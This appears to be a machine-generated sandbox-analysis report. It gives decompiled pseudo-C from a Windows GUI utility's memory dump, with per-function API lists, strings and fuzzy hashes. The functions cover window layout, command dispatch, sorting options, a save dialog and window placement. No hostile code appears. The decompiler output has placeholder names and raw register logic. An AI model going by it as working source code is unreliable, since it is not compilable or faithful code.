                                                                                                                                                      				struct HWND__* _t13;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      
                                                                                                                                                      				_t16 = __edi;
                                                                                                                                                      				_t12 = __eax;
                                                                                                                                                      				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                                                                                                      				GetClientRect(__eax, __edi + 0x24);
                                                                                                                                                      				E00403F55(__edi + 0x14);
                                                                                                                                                      				_t13 = GetWindow(GetWindow(_t12, 5), 0);
                                                                                                                                                      				while(1) {
                                                                                                                                                      					E0040169B(_t9, _t16);
                                                                                                                                                      					_t11 = GetWindow(_t13, 2);
                                                                                                                                                      					_t13 = _t11;
                                                                                                                                                      					if(_t13 == 0) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t9 = _t13;
                                                                                                                                                      				}
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32 ref: 0040171E
                                                                                                                                                        • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                      • GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                        • Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
                                                                                                                                                        • Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
                                                                                                                                                        • Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rectfree$ClientPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3078297017-0
                                                                                                                                                      • Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                      • Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
                                                                                                                                                      • Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                      • Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
                                                                                                                                                      				char _v518;
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				char _v1092;
                                                                                                                                                      				signed int _v1100;
                                                                                                                                                      				char _v1172;
                                                                                                                                                      				char* _v1176;
                                                                                                                                                      				intOrPtr _v1184;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				int _t74;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      				intOrPtr _t113;
                                                                                                                                                      				void* _t114;
                                                                                                                                                      				char* _t116;
                                                                                                                                                      				intOrPtr _t132;
                                                                                                                                                      
                                                                                                                                                      				_t114 = __edx;
                                                                                                                                                      				_t112 = __ecx;
                                                                                                                                                      				_push(_t108);
                                                                                                                                                      				_t116 = __ecx;
                                                                                                                                                      				_v1176 = __ecx;
                                                                                                                                                      				if(_a4 == 0 || _a4 == 1) {
                                                                                                                                                      					_t142 = _a8 - 0x9c62;
                                                                                                                                                      					if(_a8 == 0x9c62) {
                                                                                                                                                      						_t108 = _t116;
                                                                                                                                                      						_t74 = E0040AD95(_t116, _t142);
                                                                                                                                                      					}
                                                                                                                                                      					_t143 = _a8 - 0x9c5f;
                                                                                                                                                      					if(_a8 == 0x9c5f) {
                                                                                                                                                      						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c5e) {
                                                                                                                                                      						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
                                                                                                                                                      						_t108 = 0;
                                                                                                                                                      						E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                      						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c5c) {
                                                                                                                                                      						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
                                                                                                                                                      						_t108 = 0;
                                                                                                                                                      						E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                      						E0040A3BF(_t116);
                                                                                                                                                      						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c42) {
                                                                                                                                                      						_t74 = DestroyWindow( *(_t116 + 0x208));
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c49) {
                                                                                                                                                      						_t108 = _t116;
                                                                                                                                                      						_t74 = E0040B0C2(_t116);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c56) {
                                                                                                                                                      						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
                                                                                                                                                      						_t108 = 0;
                                                                                                                                                      						E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                      						_t74 = E0040A6FF(_t116);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c44) {
                                                                                                                                                      						_t74 = E00401BDC(_t116, 0x415);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 == 0x9c43) {
                                                                                                                                                      						E0040133A( &_v1092);
                                                                                                                                                      						_v1092 = 0x410428;
                                                                                                                                                      						E00401000( &_v1028, _t112, 0x412290);
                                                                                                                                                      						_t108 =  &_v518;
                                                                                                                                                      						E00401000( &_v518, _t112, 0x4122c4);
                                                                                                                                                      						_t132 = _v1176;
                                                                                                                                                      						_push( *((intOrPtr*)(_t132 + 0x208)));
                                                                                                                                                      						_push( &_v1092);
                                                                                                                                                      						_t93 = 0x70;
                                                                                                                                                      						E0040152F(_t93);
                                                                                                                                                      						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
                                                                                                                                                      						_t74 = E00401357( &_v1100);
                                                                                                                                                      						_t116 = _t132;
                                                                                                                                                      					}
                                                                                                                                                      					_t154 = _a8 - 0x9c41;
                                                                                                                                                      					if(_a8 == 0x9c41) {
                                                                                                                                                      						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 != 0x9c47) {
                                                                                                                                                      						L27:
                                                                                                                                                      						__eflags = _a8 - 0x9c4f;
                                                                                                                                                      						if(_a8 != 0x9c4f) {
                                                                                                                                                      							L31:
                                                                                                                                                      							__eflags = _a8 - 0x9c48;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c45;
                                                                                                                                                      							if(_a8 == 0x9c45) {
                                                                                                                                                      								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      								E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                      								_t74 = E0040A6FF(_t116);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c46;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c4a;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c65;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t74 = E0040B054(_t116, __eflags);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c4b;
                                                                                                                                                      							if(_a8 == 0x9c4b) {
                                                                                                                                                      								E0040133A( &_v1172);
                                                                                                                                                      								_v1100 = _v1100 & 0x00000000;
                                                                                                                                                      								_v1172 = 0x40f7a8;
                                                                                                                                                      								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
                                                                                                                                                      								_t82 = _v1184;
                                                                                                                                                      								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t113 + 0x224));
                                                                                                                                                      								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
                                                                                                                                                      									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
                                                                                                                                                      									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
                                                                                                                                                      										E0040B00A(_t82);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_v1172 = 0x40f7a8;
                                                                                                                                                      								_t74 = E00401357( &_v1172);
                                                                                                                                                      								_t116 = _v1176;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c4c;
                                                                                                                                                      							if(_a8 == 0x9c4c) {
                                                                                                                                                      								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c58;
                                                                                                                                                      							if(_a8 == 0x9c58) {
                                                                                                                                                      								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a8 - 0x9c4e;
                                                                                                                                                      							if(_a8 == 0x9c4e) {
                                                                                                                                                      								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
                                                                                                                                                      							}
                                                                                                                                                      							goto L52;
                                                                                                                                                      						}
                                                                                                                                                      						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
                                                                                                                                                      						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
                                                                                                                                                      							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
                                                                                                                                                      							goto L31;
                                                                                                                                                      						}
                                                                                                                                                      						_push(0xf000);
                                                                                                                                                      						_push(0x1000);
                                                                                                                                                      						goto L25;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
                                                                                                                                                      						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
                                                                                                                                                      							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
                                                                                                                                                      							goto L27;
                                                                                                                                                      						}
                                                                                                                                                      						_push(0xf000);
                                                                                                                                                      						_push(0x2000);
                                                                                                                                                      						L25:
                                                                                                                                                      						_push(0xffffffff);
                                                                                                                                                      						_t74 = E004077D8(_t88);
                                                                                                                                                      						goto L52;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L52:
                                                                                                                                                      					return _t74;
                                                                                                                                                      				}
                                                                                                                                                      			}



















                                                                                                                                                      0x0040b4d4
                                                                                                                                                      0x0040b4e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b4e8
                                                                                                                                                      0x0040b4d6
                                                                                                                                                      0x0040b4db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b48f
                                                                                                                                                      0x0040b48f
                                                                                                                                                      0x0040b49c
                                                                                                                                                      0x0040b4ba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b4ba
                                                                                                                                                      0x0040b49e
                                                                                                                                                      0x0040b4a3
                                                                                                                                                      0x0040b4a8
                                                                                                                                                      0x0040b4a8
                                                                                                                                                      0x0040b4aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b4aa
                                                                                                                                                      0x0040b5fe
                                                                                                                                                      0x0040b5fe
                                                                                                                                                      0x0040b604
                                                                                                                                                      0x0040b604

                                                                                                                                                      APIs
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040B3C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DestroyInvalidateRectWindow
                                                                                                                                                      • String ID: 33@
                                                                                                                                                      • API String ID: 724544332-1541121659
                                                                                                                                                      • Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                      • Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
                                                                                                                                                      • Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                      • Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                      			E0040A4C2(void* __eax) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				short* __esi;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				int _t27;
                                                                                                                                                      				void* _t36;
                                                                                                                                                      				intOrPtr* _t43;
                                                                                                                                                      
                                                                                                                                                      				_t36 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
                                                                                                                                                      					L11:
                                                                                                                                                      					E0040528C();
                                                                                                                                                      					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
                                                                                                                                                      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
                                                                                                                                                      					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
                                                                                                                                                      					__eflags = _t24 - 0xffffffff;
                                                                                                                                                      					if(_t24 != 0xffffffff) {
                                                                                                                                                      						L15:
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *0x4131d4; // 0x1
                                                                                                                                                      					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
                                                                                                                                                      						 *0x4131d4 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
                                                                                                                                                      					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				} else {
                                                                                                                                                      					do {
                                                                                                                                                      						__ecx = __esi;
                                                                                                                                                      						__eax = E004065EE(__eax, __esi, L"/sort");
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax != 0) {
                                                                                                                                                      							__eax =  *((intOrPtr*)(__edi + 0x6c0));
                                                                                                                                                      							_t4 = __esi + 1; // 0x1
                                                                                                                                                      							__ecx = _t4;
                                                                                                                                                      							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
                                                                                                                                                      							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
                                                                                                                                                      								__ecx = 0x40f454;
                                                                                                                                                      							} else {
                                                                                                                                                      								__ecx = __eax;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *__ecx - 0x7e;
                                                                                                                                                      							__eax =  *((intOrPtr*)(__edi + 0x69c));
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(1);
                                                                                                                                                      								__ecx = __ecx + 2;
                                                                                                                                                      							}
                                                                                                                                                      							_push(__ecx);
                                                                                                                                                      							__eax = E0040A084(__eax, __eflags);
                                                                                                                                                      						}
                                                                                                                                                      						__eax =  *((intOrPtr*)(__edi + 0x6c0));
                                                                                                                                                      						__esi = __esi + 1;
                                                                                                                                                      						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
                                                                                                                                                      					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				return SetCursor( *0x412390);
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • qsort.MSVCRT ref: 0040A591
                                                                                                                                                        • Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                      • Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                      • Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
                                                                                                                                                      • Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                      • Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v26;
                                                                                                                                                      				void _v28;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				signed int _t38;
                                                                                                                                                      				signed int _t42;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      
                                                                                                                                                      				_t24 = _a12;
                                                                                                                                                      				_t45 = _t44 - 0x18;
                                                                                                                                                      				_t42 = 0;
                                                                                                                                                      				 *_t24 = 0;
                                                                                                                                                      				if(_a8 <= 0) {
                                                                                                                                                      					_t25 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t38 = 0;
                                                                                                                                                      					_t35 = 0;
                                                                                                                                                      					if(_a8 > 0) {
                                                                                                                                                      						_v8 = _t24;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_v28 = _v28 & 0x00000000;
                                                                                                                                                      							asm("stosd");
                                                                                                                                                      							asm("stosd");
                                                                                                                                                      							asm("stosd");
                                                                                                                                                      							asm("stosd");
                                                                                                                                                      							asm("stosw");
                                                                                                                                                      							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                      							_push(L"%2.2X ");
                                                                                                                                                      							_push(0xa);
                                                                                                                                                      							_push( &_v28);
                                                                                                                                                      							L0040DFD6();
                                                                                                                                                      							_t38 = _t42;
                                                                                                                                                      							memcpy(_v8,  &_v28, 6);
                                                                                                                                                      							_t13 = _t42 + 3; // 0x3
                                                                                                                                                      							_t45 = _t45 + 0x1c;
                                                                                                                                                      							if(_t13 >= 0x2000) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_v8 = _v8 + 6;
                                                                                                                                                      							_t35 = _t35 + 1;
                                                                                                                                                      							_t42 = _t42 + 3;
                                                                                                                                                      							if(_t35 < _a8) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t24 = _a12;
                                                                                                                                                      					}
                                                                                                                                                      					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                                                      					_t25 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _t25;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                      • Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                      • Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
                                                                                                                                                      • Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                      • Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				signed int _v52;
                                                                                                                                                      				signed int _v60;
                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                      				wchar_t* _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				signed int _v80;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                      				struct tagOFNA _v96;
                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                      				wchar_t* _t38;
                                                                                                                                                      
                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                      				_t34 = __ecx;
                                                                                                                                                      				_t33 = __ebx;
                                                                                                                                                      				_t23 = 1;
                                                                                                                                                      				if(__ebx != 0) {
                                                                                                                                                      					_t23 =  *__ebx;
                                                                                                                                                      				}
                                                                                                                                                      				_v80 = _v80 & 0x00000000;
                                                                                                                                                      				_v60 = _v60 & 0x00000000;
                                                                                                                                                      				_v52 = _v52 & 0x00000000;
                                                                                                                                                      				_v72 = _t23;
                                                                                                                                                      				_v48 = _a8;
                                                                                                                                                      				_v36 = _a12;
                                                                                                                                                      				_v92 = _t34;
                                                                                                                                                      				_v96 = 0x58;
                                                                                                                                                      				_v84 = _a4;
                                                                                                                                                      				_v68 = _t38;
                                                                                                                                                      				_v64 = 0x104;
                                                                                                                                                      				_v44 = 0x80806;
                                                                                                                                                      				if(GetSaveFileNameW( &_v96) == 0) {
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					if(_t33 != 0) {
                                                                                                                                                      						 *_t33 = _v72;
                                                                                                                                                      					}
                                                                                                                                                      					wcscpy(_t38, _v68);
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileNameSavewcscpy
                                                                                                                                                      • String ID: X
                                                                                                                                                      • API String ID: 3080202770-3081909835
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				intOrPtr _t10;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				WINDOWPLACEMENT* _t15;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				struct HWND__* _t23;
                                                                                                                                                      				intOrPtr* _t24;
                                                                                                                                                      
                                                                                                                                                      				_t24 = __esi;
                                                                                                                                                      				_t18 = __eax;
                                                                                                                                                      				_t1 = _t24 + 4; // 0x40d794
                                                                                                                                                      				_t10 =  *_t1;
                                                                                                                                                      				_v8 = _t10;
                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                      					memset(__eax + 0x248, 0, 0x2c);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t23 =  *(__eax + 0x208);
                                                                                                                                                      					if(_t23 != 0) {
                                                                                                                                                      						_t15 = __eax + 0x248;
                                                                                                                                                      						_t15->length = 0x2c;
                                                                                                                                                      						GetWindowPlacement(_t23, _t15);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
                                                                                                                                                      				if(_v8 == 0) {
                                                                                                                                                      					_t14 = E004019D2(_t18);
                                                                                                                                                      				}
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
                                                                                                                                                      • memset.MSVCRT ref: 004019A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                      • String ID: WinPos
                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
                                                                                                                                                      				void _v8198;
                                                                                                                                                      				short _v8200;
                                                                                                                                                      				int _t11;
                                                                                                                                                      				int _t16;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x2004, __ecx);
                                                                                                                                                      				_t16 = 0;
                                                                                                                                                      				_v8200 = 0;
                                                                                                                                                      				memset( &_v8198, 0, 0x2000);
                                                                                                                                                      				do {
                                                                                                                                                      					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
                                                                                                                                                      					if(_t11 > 0) {
                                                                                                                                                      						_t11 = E00406E5E(_t16,  &_v8200);
                                                                                                                                                      					}
                                                                                                                                                      					_t16 = _t16 + 1;
                                                                                                                                                      				} while (_t16 <= 0xffff);
